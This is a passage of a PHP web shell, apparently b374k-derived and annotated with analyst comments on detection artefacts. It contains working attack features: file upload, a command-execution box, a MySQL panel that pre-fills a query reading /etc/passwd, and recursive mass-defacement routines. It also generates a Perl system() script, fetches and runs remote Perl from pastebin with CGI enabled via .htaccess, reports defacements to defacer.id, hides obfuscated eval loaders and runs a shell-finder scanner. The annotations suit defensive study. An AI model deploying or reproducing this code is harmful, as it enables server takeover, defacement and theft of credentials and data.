echo "<hr>";
echo "<table>";
  627. if($_GET['logout'] == true) {
  628. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  629. echo "<script>window.location='?';</script>";
  630. } elseif($_GET['do'] == 'upload') {
  631. echo "<center>";
  632. if($_POST['upload']) {
  633. if($_POST['tipe_upload'] == 'biasa') {
  634. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  635. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  636. } else {
  637. $act = "<font color=red>failed to upload file</font>";
  638. }
  639. } else {
  640. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  641. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  642. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  643. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  644. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  645. } else {
  646. $act = "<font color=red>failed to upload file</font>";
  647. }
  648. } else {
  649. $act = "<font color=red>failed to upload file</font>";
  650. }
  651. }
  652. }
  653. echo "Upload File:
  654. <form method='post' enctype='multipart/form-data'>
  655. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  656. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  657. <input type='file' name='ix_file'>
  658. <input type='submit' value='upload' name='upload'>
  659. </form>";
  660. echo $act;
  661. echo "</center>";
  662. } elseif($_GET['do'] == 'kill') {
  663. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  664. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  665. else
  666. echo '<center>unlink failed!</center>';
  667. } elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' 
method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
  668. while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
  669. foreach($tables as $table){$msg .= "<tr><td><a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
  670. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
  671. $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  672. list($total) = mysql_fetch_row($hasil);
  673. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  674. else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  675. while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
  676. $data = "&nbsp;";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
  677. for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
  678. if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
  679. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
  680. $msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
  681. if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
  682. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
  683. if($rows[$j] == "") $dataz = "&nbsp;";
  684. else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
  685. else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
  686. else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
  687. while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
  688. $msg .= "<tr><td><a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
  689. @mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
  690. <br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
  691. <?php }}
  692. elseif($_GET['do'] == 'cmd') {?>
  693. <form action="?bom&act=<?php echo $dir;?>&amp;do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
  694. <textarea class="output" readonly>
  695. <?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
  696. </textarea> <tr><td colspan="2"><?php echo "$user&nbsp;>";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
  697. <?php } elseif($_GET['do'] == 'mass_deface') {
  /**
   * Recursively writes $isi_script to a file named $namafile under $dir.
   *
   * For each entry returned by scandir($dir): "." resolves to $dir itself and
   * ".." to its parent directory, and both are written without any further
   * writability check. Every other entry that is a writable directory gets the
   * file, is reported with a "[DONE]" line, and is then handed to a recursive
   * call. Nothing is done when $dir itself is not writable.
   *
   * Analyst note: the artefact left behind is the same file name with the same
   * content in many directories, all written within one request, including one
   * level above the starting directory. File-integrity monitoring on web roots
   * and a web-server account without write access to content directories both
   * limit the effect.
   *
   * @param string $dir         Starting directory; the caller in this branch passes $_POST['d_dir'] unchanged.
   * @param string $namafile    File name created in every directory reached.
   * @param string $isi_script  Content written to each file.
   * @return void               The recursive call's result is stored in $idx and never read.
   */
  698. function sabun_massal($dir,$namafile,$isi_script) {
  699. if(is_writable($dir)) {
  700. $dira = scandir($dir);
  701. foreach($dira as $dirb) {
  702. $dirc = "$dir/$dirb";
  703. $lokasi = $dirc.'/'.$namafile;
  704. if($dirb === '.') {
  705. file_put_contents($lokasi, $isi_script);
  706. } elseif($dirb === '..') {
  707. file_put_contents($lokasi, $isi_script);
  708. } else {
  709. if(is_dir($dirc)) {
  710. if(is_writable($dirc)) {
  711. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  712. file_put_contents($lokasi, $isi_script);
  713. $idx = sabun_massal($dirc,$namafile,$isi_script);
  714. }
  715. }
  716. }
  717. }
  718. }
  719. }
  /**
   * Single-level variant of sabun_massal(): writes $isi_script to $namafile in
   * $dir, in its parent, and in each writable immediate subdirectory.
   *
   * The "." and ".." entries from scandir($dir) are written without a separate
   * writability check. Other entries are written only when they are writable
   * directories, and each of those is reported with a "[DONE]" line. There is
   * no recursive call, so deeper levels are not touched.
   *
   * Analyst note: as with the recursive variant, look for one file name with
   * identical content across sibling directories and in the parent of the
   * directory named in the request.
   *
   * @param string $dir         Starting directory; the caller in this branch passes $_POST['d_dir'] unchanged.
   * @param string $namafile    File name created in each directory.
   * @param string $isi_script  Content written to each file.
   * @return void
   */
  720. function sabun_biasa($dir,$namafile,$isi_script) {
  721. if(is_writable($dir)) {
  722. $dira = scandir($dir);
  723. foreach($dira as $dirb) {
  724. $dirc = "$dir/$dirb";
  725. $lokasi = $dirc.'/'.$namafile;
  726. if($dirb === '.') {
  727. file_put_contents($lokasi, $isi_script);
  728. } elseif($dirb === '..') {
  729. file_put_contents($lokasi, $isi_script);
  730. } else {
  731. if(is_dir($dirc)) {
  732. if(is_writable($dirc)) {
  733. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  734. file_put_contents($lokasi, $isi_script);
  735. }
  736. }
  737. }
  738. }
  739. }
  740. }
  // Request handler for this branch. When the form has been submitted, the
  // 'tipe_sabun' field selects the recursive writer ('mahal') or the
  // single-level writer ('murah'); directory, file name and file content are
  // taken from $_POST and passed on without validation.
  741. if($_POST['start']) {
  742. if($_POST['tipe_sabun'] == 'mahal') {
  743. echo "<div style='margin: 5px auto; padding: 5px'>";
  744. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  745. echo "</div>";
  746. } elseif($_POST['tipe_sabun'] == 'murah') {
  747. echo "<div style='margin: 5px auto; padding: 5px'>";
  748. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  749. echo "</div>";
  750. }
  751. } else {
  // No submission yet: render the form. Analyst note: the pre-filled values
  // below (file name and page text) are the defaults an unmodified copy of
  // this script writes, which makes them usable search strings when sweeping
  // web roots and logs.
  752. echo "<center>";
  753. echo "<form method='post'>
  754. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  755. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  756. <font style='text-decoration: underline;'>Folder:</font><br>
  757. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  758. <font style='text-decoration: underline;'>Filename:</font><br>
  759. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  760. <font style='text-decoration: underline;'>Index File:</font><br>
  761. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by FRU_403</textarea><br>
  762. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  763. </form></center>";
  764. }
  765. } elseif($_GET['do'] == 'mass_helper'){
  766. echo "<center>";
  767. echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
  768. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
  769. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
  770. echo "<form method=POST>
  771. <help title='the file you want to put in all sites'> Def page name : </help>
  772. &nbsp;&nbsp;<input title='the file name you want to put in all sites' type=text name=index value=bie.htm>&nbsp;|
  773. <help title='your deface page's source code'>Def source code :</help>
  774. &nbsp;&nbsp;<input title='your index source code' type='text' name='source' value='index.txt'><br><br>
  775. <help>List DocumentRoot from httpd.conf : </help><br>
  776. <input type=text name=dirs size=\"40\">
  777. <br><br>
  778. <help>List ServerName from httpd.conf : </help><br>
  779. <input type=text name=sites size=\"40\">
  780. <br><br>
  781. <center><input class='but' type=submit value='Generate ' name='go'></center>
  782. </form>
  783. <br/>";
  784. echo "</center>";
  // Handles the "Generate" submission of the form above. It writes two files
  // into the current working directory: mass.txt (a Perl script) and
  // sites.txt (a URL list). Both are linked from the response.
  //
  // Analyst note: mass.txt and sites.txt appearing next to a PHP file in a
  // web root are artefacts of this branch. The 'dirs' and 'sites' fields are
  // used as local file paths, so this code also reads whatever file the
  // request names.
  785. if($_POST['go']){
  786. echo "<b></b>";
  787. $index = $_POST['index'];
  788. $source = $_POST['source'];
  // Each POST value is treated as a path: the file is read, the literal
  // "DocumentRoot" / "ServerName" and all spaces are stripped (dd1 / dd2),
  // and the remainder is split into lines.
  789. $dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
  790. $sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
  791.  
  792. // preparing perl script
  793.  
  794. if($_POST['dirs']){
  795.  
  796.  
  797. $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
  798. $perl_start = "#!/usr/bin/perl";
  799. $perl_end = "print\"All Defaced !\";";
  800. fwrite ($perl,$perl_start."\n\n"); // Write !!
  801.  
  // One system("cat <source> > <dir>/<index>") line is emitted per entry of
  // $dirs; the values are concatenated into the command string as-is, with
  // only CR/LF removed from the directory by kill().
  802. foreach($dirs as $dir){
  803.  
  804. $result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
  805. fwrite ($perl, $result."\n");
  806. flush();
  807. }
  808. echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
  809. echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
  810. fwrite ($perl, "\n".$perl_end);
  811. fclose($perl);
  812.  
  813. }
  814. // preparing sites list
  815.  
  816. if($_POST['sites']){
  817.  
  818.  
  819. $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
  820. $sitess_start = "http://";
  821. $sitess_end = "/";
  822. fwrite ($sitess,"");
  823.  
  // sites.txt receives one "http://<site>/<index>" line per entry of $sites.
  824. foreach($sites as $site){
  825.  
  826. $result2 = $sitess_start.@kill($site).$sitess_end.$index;
  827. fwrite ($sitess, $result2."\n");
  828. flush();
  829. }
  830. echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
  831. fwrite ($sitess,"");
  832. fclose($sitess);
  833.  
  834. }
  835. }
  // String helpers used by the generator above.
  // kill(): returns $value with every "\n" and "\r" removed.
  836. function kill($value){ return str_replace(array("\n","\r"),"",$value); }
  // dd1(): returns $value with the literal "DocumentRoot" and all space characters removed.
  837. function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
  // dd2(): returns $value with the literal "ServerName" and all space characters removed.
  838. function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
  839. echo "<br />";
  840. echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
  841.  
  842. }elseif($_GET['do'] == 'lcf') {
  // This branch creates a priv_lcf directory under the current working
  // directory and populates it with a .htaccess and a Perl file fetched over
  // HTTP.
  //
  // Analyst note: the observable sequence is a new directory under the web
  // root, a .htaccess that enables CGI execution for .pl files, an outbound
  // HTTP request from the PHP process to a paste site, and a new file with
  // mode 0755. Blocking outbound connections from web servers, disabling
  // allow_url_fopen, and restricting AllowOverride so that .htaccess cannot
  // change Options or handlers each interrupt one step of that sequence.
  843. mkdir('priv_lcf',0755);
  844. chdir('priv_lcf');
  845. $kokdosya = ".htaccess";
  846. $dosya_adi = "$kokdosya";
  847. $dosya = fopen ($dosya_adi , 'w') or die ("Error mas broo!!!");
  // .htaccess body: turns on ExecCGI, maps .pl to the cgi-script handler, and
  // removes the PHP handler so that .php files in this directory are served
  // as application/octet-stream instead of being executed.
  848. $metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl
  849. \n \n Options \n DirectoryIndex seees.html \n RemoveHandler .php \n AddType application/octet-stream .php";
  850. fwrite ( $dosya , $metin ) ;
  851. fclose ($dosya);
  // The remote content is written to lcf.pl unmodified and without any
  // integrity check; what it contains is not visible in this file.
  852. $file = fopen("lcf.pl","w+");
  853. $write = fwrite ($file ,file_get_contents("http://pastebin.com/raw/26jAL0sz"));
  854. fclose($file);
  855. chmod("lcf.pl",0755);
  856. echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>";
  857. }elseif($_GET['do'] == 'defacerid') {
  858. echo "<center><form method='post'>
  859. <u>Defacer</u>: <br>
  860. <input type='text' name='hekel' size='50' value'FRU_403'><br>
  861. <u>Team</u>: <br>
  862. <input type='text' name='tim' size='50' value='Storm Cyber Army'><br>
  863. <u>Domains</u>: <br>
  864. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  865. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  866. </form>";
  // Submission handler for the form above: for every CRLF-separated entry in
  // the 'sites' field, one HTTP POST is sent to $form_url with the fields
  // attacker, team, poc and url, and the raw response is echoed back.
  // The 'poc' field is a fixed string and does not depend on the request.
  //
  // Analyst note: from the server's side this is outbound HTTPS from the PHP
  // process to the host named in $form_url, one request per submitted domain,
  // with the fixed User-Agent and Referer set below. Those three values are
  // usable as proxy or egress-log search terms.
  867. $site = explode("\r\n", $_POST['sites']);
  868. $go = $_POST['go'];
  869. $hekel = $_POST['hekel'];
  870. $tim = $_POST['tim'];
  871. if($go) {
  872. foreach($site as $sites) {
  873. $zh = $sites;
  874. $form_url = "https://www.defacer.id/notify";
  875. $data_to_post = array();
  876. $data_to_post['attacker'] = "$hekel";
  877. $data_to_post['team'] = "$tim";
  878. $data_to_post['poc'] = 'SQL Injection';
  879. $data_to_post['url'] = "$zh";
  880. $curl = curl_init();
  881. curl_setopt($curl,CURLOPT_URL, $form_url);
  882. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  883. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  884. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  885. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  886. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  887. $result = curl_exec($curl);
  888. echo $result;
  889. curl_close($curl);
  890. echo "<br>";
  891. }
  892. }
  893. }elseif($_GET['do'] == 'sc') {
  // The encoded payload has been removed from this copy of the paste, so what
  // this branch executes cannot be determined here. The wrapper base64-decodes
  // the string, applies ROT13, inflates it, applies ROT13 again and passes the
  // result to eval().
  // Analyst note: a nested eval(str_rot13(gzinflate(str_rot13(base64_decode(
  // chain is a strong static signature for obfuscated PHP and is worth
  // matching in file scans regardless of the payload.
  894. eval(str_rot13(gzinflate(str_rot13(base64_decode(('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'))))));
  895. }elseif($_GET['do'] == 'lh'){
  // Same decode-and-eval wrapper as the 'sc' branch; the payload is likewise
  // absent from this copy.
  896. eval(str_rot13(gzinflate(str_rot13(base64_decode(("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"))))));
  897. }elseif($_GET['do'] == 'sf') {
  898. echo'<center><h2>Shell Finder</h2>
  899. <form action="" method="post">
  900. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  901. <br>
  902. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  903. </form><br>';
  904. if (isset($_POST["scan"])) {
  905. $url = $_POST['traget'];
  906. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  907. echo "Result :<br />";
  908. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  909. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  910. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  911. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  912. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  913. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  914. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  915. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  916. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  917. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  918. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  919. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  920. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  921. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  922. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  923. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  924. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  925. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  926. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  927. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  928. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  929. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  930. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  931. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  932. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  // For every name in $shells the submitted base URL plus that name is
  // requested with get_headers(). A status line containing "200" is treated
  // as a hit, printed as a link, and appended to result.txt in the current
  // directory.
  // Analyst note: on the hosting server this appears as a burst of outbound
  // HTTP requests to a single external site from the PHP process, plus a
  // result.txt next to the script. The $shells list above is also a ready
  // wordlist of file names to look for when sweeping one's own web roots.
  933. foreach ($shells as $shell){
  934. $headers = get_headers("$url$shell"); //
  935. if (eregi('200', $headers[0])) {
  936. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Selesai Ndan</span><br /><br/><br/>"; //
  937. $dz = fopen('result.txt', 'a+');
  938. $suck = "$url$shell";
